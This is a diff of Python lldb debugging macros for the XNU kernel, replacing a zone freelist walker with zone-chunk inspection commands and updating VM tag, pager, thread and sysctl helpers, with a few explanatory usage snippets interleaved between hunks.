-    while ShowZfreeList.elts_found < zlimit:
-        ShowZfreeList.elts_found += 1
-        znext = dereference(Cast(current, 'vm_offset_t *'))
-        znext = (unsigned(znext) ^ unsigned(kern.globals.zp_nopoison_cookie))
-        znext = kern.GetValueFromAddress(znext, 'vm_offset_t *')
-        backup_ptr = kern.GetValueFromAddress((unsigned(Cast(current, 'vm_offset_t')) + unsigned(zone.z_elem_size) - sizeof('vm_offset_t')), 'vm_offset_t *')
-        backup_val = dereference(backup_ptr)
-        n_unobfuscated = (unsigned(backup_val) ^ unsigned(kern.globals.zp_nopoison_cookie))
-        p_unobfuscated = (unsigned(backup_val) ^ unsigned(kern.globals.zp_poisoned_cookie))
-        poison_str = ''
-        if p_unobfuscated == unsigned(znext):
-            poison_str = "P ({0: <d})".format(ShowZfreeList.elts_found - ShowZfreeList.last_poisoned)
-            ShowZfreeList.last_poisoned = ShowZfreeList.elts_found
-        else:
-            if n_unobfuscated != unsigned(znext):
-                poison_str = "INVALID"
-        print "{0: <7d} 0x{1:0>16x} 0x{2:0>16x} 0x{3:0>16x} 0x{4:0>16x} 0x{5:0>16x} {6: <14s}\n".format(
-              ShowZfreeList.elts_found, unsigned(current), unsigned(znext),
-              unsigned(backup_val), n_unobfuscated, p_unobfuscated, poison_str)
-        if unsigned(znext) == 0:
-            break
-        current = Cast(znext, 'void *')
+# Macro: showzchunks
 
 def ZoneIteratePageQueue(page):
     while page.packed_address:
@@ -783,42 +811,108 @@ def ZoneIteratePageQueue(page):
         yield meta
         page = meta.meta.zm_page_next
 
-@static_var('elts_found',0)
-@static_var('last_poisoned',0)
-@lldb_command('showzfreelist')
-def ShowZfreeList(cmd_args=None):
-    """ Walk the freelist for a zone, printing out the primary and backup next pointers, the poisoning cookies, and the poisoning status of each element.
-    Usage: showzfreelist <zone> [iterations]
+@header("{: <20s} {: <20s} {: <20s} {: <25s} {: <10s} {: <8s} {: <4s} {: >9s}".format(
+    "Zone", "Metadata", "Page", "Bitmap", "Kind", "Queue", "Pgs", "Allocs"))
+def GetZoneChunk(meta, queue, O=None):
+    format_string  = "{meta.zone: <#20x} "
+    format_string += "{meta.meta_addr: <#20x} {meta.page_addr: <#20x} "
+    format_string += "{bitmap: <#18x} @{bitmap_size:<5d} "
+    format_string += "{kind:<10s} {queue:<8s} {pgs:<1d}/{chunk:<1d}  "
+    format_string += "{alloc_count: >4d}/{avail_count: >4d}"
+
+    pgs = int(meta.zone.z_chunk_pages)
+    chunk = pgs
+    if meta.meta.zm_chunk_len >= 0xe:
+        kind = "secondary"
+        pgs -= int(meta.meta.zm_page_index)
+    else:
+        kind = "primary"
+
+    alloc_count=meta.getAllocCount()
+    avail_count=meta.getAllocAvail()
+    free_count=meta.getFreeCountSlow()
+
+    if alloc_count + free_count != avail_count:
+        format_string += " {VT.Red}bitmap mismatch{VT.Default}"
+
+    return O.format(format_string, meta=meta,
+            alloc_count=alloc_count,
+            avail_count=avail_count,
+            bitmap=meta.getBitmap(),
+            bitmap_size=meta.getBitmapSize(),
+            queue=queue, kind=kind, pgs=pgs, chunk=chunk)
+
+def ShowZChunksImpl(zone, extra_addr=None, cmd_options={}, O=None):
+    verbose = '-V' in cmd_options
+
+    def do_content(meta, O, indent=False):
+        with O.table("{:>5s}  {:<20s} {:<10s}".format("#", "Element", "State"), indent=indent):
+            i = 0
+            for e in meta.iterateElements():
+                status = "Allocated"
+                if meta.isElementFree(e):
+                    status = "Free"
+                print O.format("{:5d}  {:<#20x} {:10s}", i, e, status)
+                i += 1
+
+    if extra_addr is None:
+        with O.table(GetZoneChunk.header):
+            for meta in ZoneIteratePageQueue(zone.z_pageq_full):
+                print GetZoneChunk(meta, "full", O)
+                if verbose: do_content(meta, O, indent=True);
+
+            for meta in ZoneIteratePageQueue(zone.z_pageq_partial):
+                print GetZoneChunk(meta, "partial", O)
+                if verbose: do_content(meta, O, indent=True);
+
+            for meta in ZoneIteratePageQueue(zone.z_pageq_empty):
+                print GetZoneChunk(meta, "empty", O)
+                if verbose: do_content(meta, O, indent=True);
+
+            for meta in ZoneIteratePageQueue(zone.z_pageq_va):
+                print GetZoneChunk(meta, "va", O)
+    else:
+        meta = ZoneMeta(extra_addr, isPageIndex="-I" in cmd_options).getReal()
+        with O.table(GetZoneChunk.header):
+            print GetZoneChunk(meta, "N/A", O)
+        do_content(meta, O)
+
+@lldb_command('showzchunks', "IV", fancy=True)
+def ShowZChunks(cmd_args=None, cmd_options={}, O=None):
+    """
+    prints the list of zone chunks, or the content of a given chunk
+
+    Usage: showzchunks <zone> [-I] [-V] [address]
+
+    Use -I       to interpret [address] as a page index
+    Use -V       to show the contents of all the chunks
 
-        Will walk up to 50 elements by default, pass a limit in 'iterations' to override.
+    [address]    can be any address belonging to the zone, or its metadata
     """
+
     if not cmd_args:
-        print ShowZfreeList.__doc__
-        return
-    ShowZfreeList.elts_found = 0
-    ShowZfreeList.last_poisoned = 0
+        return O.error('missing zone argument')
 
     zone = kern.GetValueFromAddress(cmd_args[0], 'struct zone *')
-    zlimit = 50
-    if len(cmd_args) >= 2:
-        zlimit = ArgumentStringToInt(cmd_args[1])
-    ShowZfreeListHeader(zone)
 
-    for head in [zone.pages_any_free_foreign, zone.pages_intermediate, zone.pages_all_free]:
-        for free_page_meta in ZoneIteratePageQueue(head):
-            if ShowZfreeList.elts_found == zlimit:
-                break
-            zfirst = free_page_meta.getFreeList()
-            if zfirst != 0:
-                ShowZfreeListChain(zone, zfirst, zlimit)
-
-    if ShowZfreeList.elts_found == zlimit:
-        print "Stopped at {0: <d} elements!".format(zlimit)
+    if len(cmd_args) == 1:
+        ShowZChunksImpl(zone, cmd_options=cmd_options, O=O)
     else:
-        print "Found {0: <d} elements!".format(ShowZfreeList.elts_found)
+        addr = unsigned(kern.GetValueFromAddress(cmd_args[1]))
+        ShowZChunksImpl(zone, extra_addr=addr, cmd_options=cmd_options, O=O)
+
+@lldb_command('showallzchunks', fancy=True)
+def ShowAllZChunks(cmd_args=None, cmd_options={}, O=None):
+    """
+    prints the list of all zone chunks
+
+    Usage: showallzchunks
+    """
 
-# EndMacro: showzfreelist
+    for z in kern.zones:
+        ShowZChunksImpl(z, O=O)
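+
+# Example invocations (addresses are hypothetical):
+#   (lldb) showzchunks 0xffffff80a1b2c300        # chunks of one zone
+#   (lldb) showzchunks 0xffffff80a1b2c300 -V     # plus per-element state
+#   (lldb) showallzchunks                        # every zone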
 
+# EndMacro: showzchunks
 # Macro: zstack_showzonesbeinglogged
 
 @lldb_command('zstack_showzonesbeinglogged')
@@ -1338,7 +1432,7 @@ def ShowPCPU(cmd_args=None, cmd_options={}, O=None):
     ty  = var.GetSBValue().GetTypeName()
 
     r = range(0, ncpu)
-    if cpu:
+    if cpu is not None:
         r = range(cpu, cpu + 1)
 
     def PCPUSlot(pcpu_var, i):
@@ -3438,6 +3532,7 @@ FixedTags = {
     26: "VM_KERN_MEMORY_SKYWALK",
     27: "VM_KERN_MEMORY_LTABLE",
     28: "VM_KERN_MEMORY_HV",
+    29: "VM_KERN_MEMORY_RETIRED",
     255:"VM_KERN_MEMORY_ANY",
 }
 
@@ -3461,17 +3556,19 @@ def GetVMKernName(tag):
                 return (kern.Symbolicate(site), "")
     return ("", "")
 
-@lldb_command("showvmtags", "ASJ")
+@lldb_command("showvmtags", "ASJO")
 def showvmtags(cmd_args=None, cmd_options={}):
     """Routine to print out info about kernel wired page allocations
         usage: showvmtags
                iterates kernel map and vm objects totaling allocations by tag.
-        usage: showvmtags -S
+        usage: showvmtags -S [-O]
                also iterates kernel object pages individually - slow.
-        usage: showvmtags -A
+        usage: showvmtags -A [-O]
                show all tags, even tags that have no wired count
-        usage: showvmtags -J
+        usage: showvmtags -J [-O]
                 Output json
+
+        -O: list in increasing size order
     """
     slow = False
     print_json = False
@@ -3486,7 +3583,6 @@ def showvmtags(cmd_args=None, cmd_options={}):
     page_size = unsigned(kern.globals.page_size)
     nsites = unsigned(kern.globals.vm_allocation_tag_highest) + 1
     tagcounts = [0] * nsites
-    tagpeaks = [0] * nsites
     tagmapped = [0] * nsites
 
     if kern.globals.vm_tag_active_update:
@@ -3495,7 +3591,6 @@ def showvmtags(cmd_args=None, cmd_options={}):
             if site:
                 tagcounts[tag] = unsigned(site.total)
                 tagmapped[tag] = unsigned(site.mapped)
-                tagpeaks[tag] = unsigned(site.peak)
     else:
         queue_head = kern.globals.vm_objects_wired
         for object in IterateQueue(queue_head, 'struct vm_object *', 'wired_objq'):
@@ -3516,7 +3611,6 @@ def showvmtags(cmd_args=None, cmd_options={}):
             current["name"] = sitestr
             current["size"] = tagcounts[tag]
             current["mapped"] = tagmapped[tag]
-            current["peak"] = tagpeaks[tag]
             current["tag"] = tag
             current["tagstr"] = tagstr
             current["subtotals"] = []
@@ -3537,24 +3631,27 @@ def showvmtags(cmd_args=None, cmd_options={}):
                     })
             tags.append(current)
 
+    if "-O" in cmd_options:
+        tags.sort(key = lambda tag: tag['size'])
+
     if print_json:
         print json.dumps(tags)
     else:
         print " vm_allocation_tag_highest: {:<7d}  ".format(nsites - 1)
-        print " {:<7s}  {:>7s}   {:>7s}   {:>7s}  {:<50s}".format("tag.kmod", "peak", "size", "mapped", "name")
+        print " {:<7s}  {:>7s}   {:>7s}  {:<50s}".format("tag.kmod", "size", "mapped", "name")
         for tag in tags:
             if not tagstr:
                 tagstr = ""
-            print " {:>3d}{:<4s}  {:>7d}K  {:>7d}K  {:>7d}K  {:<50s}".format(tag["tag"], tag["tagstr"], tag["peak"] / 1024, tag["size"] / 1024, tag["mapped"] / 1024, tag["name"])
+            print " {:>3d}{:<4s}  {:>7d}K  {:>7d}K  {:<50s}".format(tag["tag"], tag["tagstr"], tag["size"] / 1024, tag["mapped"] / 1024, tag["name"])
             for sub in tag["subtotals"]:
                 if ((sub["flags"] & 0x007f) == 0):
                     kind_str = "named"
                 else:
                     kind_str = "from"
 
-                print " {:>7s}  {:>7s}   {:>7s}   {:>7d}K      {:s} {:>3d}{:<4s} {:<50s}".format(" ", " ", " ", sub["amount"] / 1024, kind_str, sub["tag"], sub["tagstr"], sub["sitestr"])
+                print " {:>7s}  {:>7d}K      {:s}  {:>3d}{:<4s} {:<50s}".format(" ", sub["amount"] / 1024, kind_str, sub["tag"], sub["tagstr"], sub["sitestr"])
 
-        print "Total:              {:>7d}K  {:>7d}K".format(total / 1024, totalmapped / 1024)
+        print "Total:    {:>7d}K  {:>7d}K".format(total / 1024, totalmapped / 1024)
     return None
 
 
@@ -3759,22 +3856,14 @@ def ShowAllocatedElementsInZone(cmd_args=None, cmd_options={}):
 def FindAllocatedElementsInZone(zone):
     elements = []
 
-    if not zone.z_self or zone.permanent:
+    if not zone.z_self or zone.z_permanent:
         return elements
 
-    for head in [zone.pages_any_free_foreign, zone.pages_all_used_foreign,
-            zone.pages_intermediate, zone.pages_all_used]:
-
+    for head in [zone.z_pageq_partial, zone.z_pageq_full]:
         for meta in ZoneIteratePageQueue(head):
-            free_elements = set(meta.iterateFreeList())
-
             for elem in meta.iterateElements():
-                if elem in free_elements:
-                    continue
-
-                if elem not in free_elements:
+                if not meta.isElementFree(elem):
                     elements.append(elem)
-                elem += zone.z_elem_size
 
     return elements
 
@@ -4145,7 +4234,7 @@ def ShowAllAppleProtectPagers(cmd_args=None):
     """Routine to print all apple_protect pagers
         usage: show_all_apple_protect_pagers
     """
-    print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "mo_control", "object", "offset", "crypto_offset", "crypto_start", "crypto_end")
+    print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "cached", "object", "offset", "crypto_offset", "crypto_start", "crypto_end")
     qhead = kern.globals.apple_protect_pager_queue
     qtype = GetType('apple_protect_pager *')
     qcnt = kern.globals.apple_protect_pager_count
@@ -4173,7 +4262,56 @@ def show_apple_protect_pager(pager, qcnt, idx):
         shadow = object.shadow
     vnode_pager = Cast(object.pager,'vnode_pager *')
     filename = GetVnodePath(vnode_pager.vnode_handle)
-    print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {: <#018x} {: <#018x} {:#018x} {:#018x} {:#018x} {:#018x}\n\tcrypt_info:{: <#018x} <decrypt:{: <#018x} end:{:#018x} ops:{: <#018x} refs:{:<d}>\n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, pager.ref_count, pager.is_ready, pager.is_mapped, pager.pager_control, pager.backing_object, pager.backing_offset, pager.crypto_backing_offset, pager.crypto_start, pager.crypto_end, pager.crypt_info, pager.crypt_info.page_decrypt, pager.crypt_info.crypt_end, pager.crypt_info.crypt_ops, pager.crypt_info.crypt_refcnt, vnode_pager.vnode_handle, filename)
+    if hasattr(pager, "ap_pgr_hdr_ref"):
+        refcnt = pager.ap_pgr_hdr_ref
+    else:
+        refcnt = pager.ap_pgr_hdr.mo_ref
+    print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {:>6d} {: <#018x} {:#018x} {:#018x} {:#018x} {:#018x}\n\tcrypt_info:{: <#018x} <decrypt:{: <#018x} end:{:#018x} ops:{: <#018x} refs:{:<d}>\n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, refcnt, pager.is_ready, pager.is_mapped, pager.is_cached, pager.backing_object, pager.backing_offset, pager.crypto_backing_offset, pager.crypto_start, pager.crypto_end, pager.crypt_info, pager.crypt_info.page_decrypt, pager.crypt_info.crypt_end, pager.crypt_info.crypt_ops, pager.crypt_info.crypt_refcnt, vnode_pager.vnode_handle, filename)
+    showvmobject(pager.backing_object, pager.backing_offset, pager.crypto_end - pager.crypto_start, 1, 1)
+
+@lldb_command("show_all_shared_region_pagers")
+def ShowAllSharedRegionPagers(cmd_args=None):
+    """Routine to print all shared_region pagers
+        usage: show_all_shared_region_pagers
+    """
+    print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "object", "offset", "jop_key", "slide", "slide_info")
+    qhead = kern.globals.shared_region_pager_queue
+    qtype = GetType('shared_region_pager *')
+    qcnt = kern.globals.shared_region_pager_count
+    idx = 0
+    for pager in IterateQueue(qhead, qtype, "srp_queue"):
+        idx = idx + 1
+        show_shared_region_pager(pager, qcnt, idx)
+
+@lldb_command("show_shared_region_pager")
+def ShowSharedRegionPager(cmd_args=None):
+    """Routine to print out info about a shared_region pager
+        usage: show_shared_region_pager <pager>
+    """
+    if cmd_args == None or len(cmd_args) < 1:
+        print "Invalid argument.", ShowSharedRegionPager.__doc__
+        return
+    pager = kern.GetValueFromAddress(cmd_args[0], 'shared_region_pager_t')
+    show_shared_region_pager(pager, 1, 1)
+
+def show_shared_region_pager(pager, qcnt, idx):
+    object = pager.srp_backing_object
+    shadow = object.shadow
+    while shadow != 0:
+        object = shadow
+        shadow = object.shadow
+    vnode_pager = Cast(object.pager,'vnode_pager *')
+    filename = GetVnodePath(vnode_pager.vnode_handle)
+    if hasattr(pager, 'srp_ref_count'):
+        ref_count = pager.srp_ref_count
+    else:
+        ref_count = pager.srp_header.mo_ref
+    if hasattr(pager, 'srp_jop_key'):
+        jop_key = pager.srp_jop_key
+    else:
+        jop_key = -1
+    print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {: <#018x} {:#018x} {:#018x} {:#018x}\n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, ref_count, pager.srp_is_ready, pager.srp_is_mapped, pager.srp_backing_object, pager.srp_backing_offset, jop_key, pager.srp_slide_info.si_slide, pager.srp_slide_info, vnode_pager.vnode_handle, filename)
+    showvmobject(pager.srp_backing_object, pager.srp_backing_offset, pager.srp_slide_info.si_end - pager.srp_slide_info.si_start, 1, 1)
 
 @lldb_command("show_console_ring")
 def ShowConsoleRingData(cmd_args=None):
@@ -4545,36 +4683,6 @@ def vm_page_lookup_in_compressor(slot_ptr):
     else:
         print "<no compressed data>"
 
-def print_hex_data(data, begin_offset=0, desc=""):
-    """ print on stdout "hexdump -C < data" like output
-        params:
-            data - bytearray or array of int where each int < 255
-            begin_offset - int offset that should be printed in left column
-            desc - str optional description to print on the first line to describe data
-    """
-    if desc:
-        print "{}:".format(desc)
-    index = 0
-    total_len = len(data)
-    hex_buf = ""
-    char_buf = ""
-    while index < total_len:
-        hex_buf += " {:02x}".format(data[index])
-        if data[index] < 0x20 or data[index] > 0x7e:
-            char_buf += "."
-        else:
-            char_buf += "{:c}".format(data[index])
-        index += 1
-        if index and index % 8 == 0:
-            hex_buf += " "
-        if index > 1 and (index % 16) == 0:
-            print "{:08x} {: <50s} |{: <16s}|".format(begin_offset + index - 16, hex_buf, char_buf)
-            hex_buf = ""
-            char_buf = ""
-    if index % 16 != 0:
-        print "{:08x} {: <50s} |{: <16s}|".format(begin_offset + index - 16, hex_buf, char_buf)
-    return
-
 @lldb_command('vm_scan_all_pages')
 def VMScanAllPages(cmd_args=None):
     """Scans the vm_pages[] array
index c7d5f493ce6f4ca731c3c3666b4473a6ccbfa1e0..6bab4e27c6124055b940765df3c06191fdcbc145 100755 (executable)
@@ -11,6 +11,7 @@ import time
 import xnudefines
 import memory
 import json
+from collections import defaultdict
 
 def GetProcName(proc):
     """ returns a string name of the process. Longer variant is preffered if provided.
@@ -26,17 +27,25 @@ def GetProcName(proc):
         return str(proc.p_comm)
 
 def GetProcNameForTask(task):
-    """ returns a string name of the process. if proc is not valid "unknown" is returned
+    """ returns a string name of the process. If proc is not valid the proc
+        name is looked up in the associated importance structure (if
+        available). If no name can be found, "unknown"  is returned.
         params:
             task: value object representing a task in the kernel.
         returns:
             str : A string name of the process linked to the task
     """
-    if not task or not unsigned(task.bsd_info):
-        return "unknown"
-    p = Cast(task.bsd_info, 'proc *')
+    if task:
+        if unsigned(task.bsd_info):
+            p = Cast(task.bsd_info, 'proc *')
+            return GetProcName(p)
+
+        if (hasattr(task, 'task_imp_base') and
+           hasattr(task.task_imp_base, 'iit_procname') and
+           unsigned(task.task_imp_base) != 0):
+            return str(task.task_imp_base.iit_procname)
 
-    return GetProcName(p)
+    return "unknown"
 
 def GetProcPIDForTask(task):
     """ returns a int pid of the process. if the proc is not valid, val[5] from audit_token is returned.
@@ -187,6 +196,7 @@ def GetASTSummary(ast):
         K - AST_KPERF
         M - AST_MACF
         r - AST_RESET_PCS
+        a - AST_ARCADE
         G - AST_GUARD
         T - AST_TELEMETRY_USER
         T - AST_TELEMETRY_KERNEL
@@ -201,12 +211,12 @@ def GetASTSummary(ast):
     out_string = ""
     state = int(ast)
     thread_state_chars = {0x0:'', 0x1:'P', 0x2:'Q', 0x4:'U', 0x8:'H', 0x10:'Y', 0x20:'A',
-                          0x40:'L', 0x80:'B', 0x100:'K', 0x200:'M', 0x400: 'r',
+                          0x40:'L', 0x80:'B', 0x100:'K', 0x200:'M', 0x400: 'r', 0x800: 'a',
                           0x1000:'G', 0x2000:'T', 0x4000:'T', 0x8000:'T', 0x10000:'S',
                           0x20000: 'D', 0x40000: 'I', 0x80000: 'E', 0x100000: 'R', 0x200000: 'N'}
     state_str = ''
     mask = 0x1
-    while mask <= 0x80000:
+    while mask <= 0x200000:
         state_str += thread_state_chars[int(state & mask)]
         mask = mask << 1
 
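A quick worked example of the scan above, with the table and loop exactly as shown: the value 0x880 has the 0x80 and 0x800 bits set, so the bit walk appends 'B' and then the newly added 'a'.

    state = 0x880
    state_str = ''
    mask = 0x1
    while mask <= 0x200000:
        # Unset bits map to the empty string; set bits map to their letter.
        state_str += thread_state_chars[int(state & mask)]
        mask = mask << 1
    print state_str   # -> "Ba"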
@@ -583,7 +593,7 @@ def GetThreadGroupSummary(tg):
         tg_flags += 'E'
     if (tg.tg_flags & 0x2):
         tg_flags += 'U'
-    out_string += format_string.format(tg, tg.tg_id, tg.tg_name, tg.tg_refcount, tg_flags, tg.tg_recommendation)
+    out_string += format_string.format(tg, tg.tg_id, tg.tg_name, tg.tg_refcount.ref_count, tg_flags, tg.tg_recommendation)
     return out_string
 
 @lldb_command('showallthreadgroups')
@@ -1052,8 +1062,20 @@ def ShowTerminatedTasks(cmd_args=None):
     global kern
     print GetTaskSummary.header + " " + GetProcSummary.header
     for t in kern.terminated_tasks:
+
+        # If the task has been terminated it's likely that the process is
+        # gone too. If there is no proc it may still be possible to find
+        # the original proc name.
         pval = Cast(t.bsd_info, 'proc *')
-        print GetTaskSummary(t) +" "+ GetProcSummary(pval)
+        if pval:
+            psummary = GetProcSummary(pval)
+        else:
+            name = GetProcNameForTask(t)
+            pslen = GetProcSummary.header.find("command")
+            psummary = "{0: <{indent}} {1: <s}".format("", name, indent=pslen - 1)
+
+        print GetTaskSummary(t) + " " + psummary
+
     return True
 
 # Macro: showtaskstacks
@@ -1166,15 +1188,41 @@ def ShowProcRefs(cmd_args = None):
 def ShowAllThreads(cmd_args = None):
     """ Display info about all threads in the system
     """
+
+    # Terminated threads get prefixed with a 'T'
+    def ShowTaskTerminatedThreads(task):
+        tlist = tmap.get(unsigned(task), [])
+        for thval in tlist:
+            print "T\t" + GetThreadSummary(thval)
+
+    # Task -> [thread, ..] map of terminated threads
+    tmap = defaultdict(list)
+    for thr in kern.terminated_threads:
+        tmap[unsigned(thr.task)].append(thr)
+
     for t in kern.tasks:
         ShowTaskThreads([str(int(t))])
+        ShowTaskTerminatedThreads(t)
         print " \n"
-        
+
     for t in kern.terminated_tasks:
         print "Terminated: \n"
         ShowTaskThreads([str(int(t))])
+        ShowTaskTerminatedThreads(t)
         print " \n"
-        
+
+    return
+
+@lldb_command('showterminatedthreads')
+def ShowTerminatedThreads(cmd_args=None):
+    """ Display info about all terminated threads in the system
+    """
+
+    global kern
+    print GetThreadSummary.header
+    for t in kern.terminated_threads:
+        print GetThreadSummary(t)
+
     return
 
 @lldb_command('showtaskthreads', "F:")
@@ -1346,7 +1394,7 @@ def GetFullBackTrace(frame_addr, verbosity = vHUMAN, prefix = ""):
         if (not kern.arch.startswith('arm') and frame_ptr < mh_execute_addr) or (kern.arch.startswith('arm') and frame_ptr > mh_execute_addr):
             break
         pc_val = kern.GetValueFromAddress(frame_ptr + kern.ptrsize,'uintptr_t *')
-        pc_val = unsigned(dereference(pc_val))
+        pc_val = kern.StripKernelPAC(unsigned(dereference(pc_val)))
         out_string += prefix + GetSourceInformationForAddress(pc_val) + "\n"
         bt_count +=1
         previous_frame_ptr = frame_ptr
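On arm64e targets the saved return address in a frame carries a pointer-authentication signature, so the raw load has to be stripped before symbolication; in isolation the updated step looks like the sketch below (StripKernelPAC is expected to pass values through unchanged on targets without pointer authentication):

    pc_ptr = kern.GetValueFromAddress(frame_ptr + kern.ptrsize, 'uintptr_t *')
    # Strip the PAC signature bits (if any) so the address can be symbolicated.
    pc_val = kern.StripKernelPAC(unsigned(dereference(pc_ptr)))
    print GetSourceInformationForAddress(pc_val)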
index 6039f204833ac91e7824e6ddf58c9a19e8f47338..b726867d58b83fc67fcf0b1fc749633c67cf3801 100755 (executable)
@@ -305,25 +305,38 @@ def WriteInt8ToMemoryAddress(intval, addr):
     return False 
 
 _enum_cache = {}
-def GetEnumValue(name):
+def GetEnumValue(enum_name_or_combined, member_name = None):
     """ Finds the value of a particular enum define. Ex kdp_req_t::KDP_VERSION  => 0x3
         params:
-            name : str - name of enum in the format type::name
+            enum_name_or_combined: str
+                either the legacy combined form "type::member", or
+                the name of an enum type when member_name is given.
+            member_name: None, or the name of an enum member
+                (in which case enum_name_or_combined is the type name).
         returns:
             int - value of the particular enum.
         raises:
             TypeError - if the enum is not found
     """
-    name = name.strip()
     global _enum_cache
-    if name not in _enum_cache:
-        res = lldb.SBCommandReturnObject()
-        lldb.debugger.GetCommandInterpreter().HandleCommand("p/x (`%s`)" % name, res)
-        if not res.Succeeded():
-            raise TypeError("Enum not found with name: " + name)
-        # the result is of format '(int) $481 = 0x00000003\n'
-        _enum_cache[name] = int( res.GetOutput().split('=')[-1].strip(), 16)
-    return _enum_cache[name]
+    if member_name is None:
+        enum_name, member_name = enum_name_or_combined.strip().split("::")
+    else:
+        enum_name = enum_name_or_combined
+
+    if enum_name not in _enum_cache:
+        ty = GetType(enum_name)
+        d  = {}
+
+        for e in ty.get_enum_members_array():
+            if ty.GetTypeFlags() & lldb.eTypeIsSigned:
+                d[e.GetName()] = e.GetValueAsSigned()
+            else:
+                d[e.GetName()] = e.GetValueAsUnsigned()
+
+        _enum_cache[enum_name] = d
+
+    return _enum_cache[enum_name][member_name]
 
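Both spellings accepted by the reworked lookup should resolve to the same value; using the example already quoted in the docstring:

    v_legacy = GetEnumValue('kdp_req_t::KDP_VERSION')
    v_split  = GetEnumValue('kdp_req_t', 'KDP_VERSION')
    assert v_legacy == v_split == 0x3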
 def ResolveFSPath(path):
     """ expand ~user directories and return absolute path.
@@ -442,12 +455,13 @@ def IsAppleInternal():
         retval = False
     return retval
 
-def print_hex_data(data, begin_offset=0, desc=""):
+def print_hex_data(data, begin_offset=0, desc="", marks={}):
     """ print on stdout "hexdump -C < data" like output
         params:
             data - bytearray or array of int where each int < 255
             begin_offset - int offset that should be printed in left column
             desc - str optional description to print on the first line to describe data
+            marks - dict of absolute offset -> marker character, printed in place of the space before that byte
     """
     if desc:
         print "{}:".format(desc)
@@ -456,7 +470,11 @@ def print_hex_data(data, begin_offset=0, desc=""):
     hex_buf = ""
     char_buf = ""
     while index < total_len:
-        hex_buf += " {:02x}".format(data[index])
+        if (begin_offset + index) in marks:
+            hex_buf += marks[begin_offset + index]
+            hex_buf += "{:02x}".format(data[index])
+        else:
+            hex_buf += " {:02x}".format(data[index])
         if data[index] < 0x20 or data[index] > 0x7e:
             char_buf += "."
         else:
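A usage sketch of the new marks parameter: keys are absolute offsets (begin_offset + index) and each value replaces the single space normally printed before that byte, so one-character markers keep the hex columns aligned.

    data = bytearray("hello, kernel!\x00\x00")
    # The byte at absolute offset 0x1004 ('o', 0x6f) renders as "*6f" instead of " 6f".
    print_hex_data(data, begin_offset=0x1000, desc="sample", marks={0x1004: '*'})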
index d935362abe8c0ea7a31249ee6fb03e2e433ff0fc..ce5997b5efed37be4e52d43dfa59383821eebf6d 100755 (executable)
@@ -284,7 +284,7 @@ def GetObjectAtIndexFromArray(array_base, index):
     base_address = array_base_val.GetValueAsUnsigned()
     size = array_base_val.GetType().GetPointeeType().GetByteSize()
     obj_address = base_address + (index * size)
-    obj = kern.GetValueFromAddress(obj_address, array_base_val.GetType().GetName())
+    obj = kern.GetValueFromAddress(obj_address, array_base_val.GetType())
     return Cast(obj, array_base_val.GetType())
 
 
@@ -1169,7 +1169,35 @@ def TrapTrace_cmd(cmd_args=[], cmd_options={}):
 
     Trace_cmd(cmd_args, cmd_options, hdrString, entryString, kern.globals.traptrace_ring,
         kern.globals.traptrace_entries_per_cpu, MAX_TRAPTRACE_BACKTRACES)
-                
+
+# Generator that yields (sysctl_oid, depth, parent_name) tuples for every sysctl
+# reachable from the provided root, optionally restricted to the given name prefix.
+def IterateSysctls(root_oid=kern.globals.sysctl__children, prefix="", depth = 0, parent = ""):
+    headp = root_oid
+    for pp in IterateListEntry(headp, 'struct sysctl_oid *', 'oid_link', 's'):
+        node_str = ""
+        if prefix != "":
+            node_str = str(pp.oid_name)
+            if parent != "":
+                node_str = parent + "." + node_str
+                if node_str.startswith(prefix):
+                    yield pp, depth, parent
+        else:
+            yield pp, depth, parent
+        type = pp.oid_kind & 0xf
+        if type == 1 and pp.oid_arg1 != 0:
+            if node_str == "":
+                next_parent = str(pp.oid_name)
+                if parent != "":
+                    next_parent = parent + "." + next_parent
+            else:
+                next_parent = node_str
+            # Only recurse if the next parent starts with our allowed prefix.
+            # Note that it's OK if the parent string is too short (because the prefix might be for a deeper node).
+            prefix_len = min(len(prefix), len(next_parent))
+            if next_parent[:prefix_len] == prefix[:prefix_len]:
+                for x in IterateSysctls(Cast(pp.oid_arg1, "struct sysctl_oid_list *"), prefix, depth + 1, next_parent):
+                    yield x
 
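Because IterateSysctls is a generator, callers can walk or count the tree lazily instead of materializing it; a small sketch that tallies the nodes under a prefix (the prefix is only illustrative):

    count = 0
    for oid, depth, parent in IterateSysctls(kern.globals.sysctl__children, "kern."):
        count += 1
    print "{:d} sysctl entries under kern.".format(count)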
 @lldb_command('showsysctls', 'P:')
 def ShowSysctls(cmd_args=[], cmd_options={}):
@@ -1186,28 +1214,63 @@ def ShowSysctls(cmd_args=[], cmd_options={}):
     else:
         _ShowSysctl_prefix = ''
         allowed_prefixes = []
-    def IterateSysctls(oid, parent_str, i):
-        headp = oid
-        parentstr = "<none>" if parent_str is None else parent_str
-        for pp in IterateListEntry(headp, 'struct sysctl_oid *', 'oid_link', 's'):
-            type = pp.oid_kind & 0xf
-            next_parent = str(pp.oid_name)
-            if parent_str is not None:
-                next_parent = parent_str + "." + next_parent
-            st = (" " * i) + str(pp.GetSBValue().Dereference()).replace("\n", "\n" + (" " * i))
-            if type == 1 and pp.oid_arg1 != 0:
-                # Check allowed_prefixes to see if we can recurse from root to the allowed prefix.
-                # To recurse further, we need to check only the the next parent starts with the user-specified
-                # prefix
-                if next_parent not in allowed_prefixes and next_parent.startswith(_ShowSysctl_prefix) is False:
-                    continue
-                print 'parent = "%s"' % parentstr, st[st.find("{"):]
-                IterateSysctls(Cast(pp.oid_arg1, "struct sysctl_oid_list *"), next_parent, i + 2)
-            elif _ShowSysctl_prefix == '' or next_parent.startswith(_ShowSysctl_prefix):
-                print ('parent = "%s"' % parentstr), st[st.find("{"):]
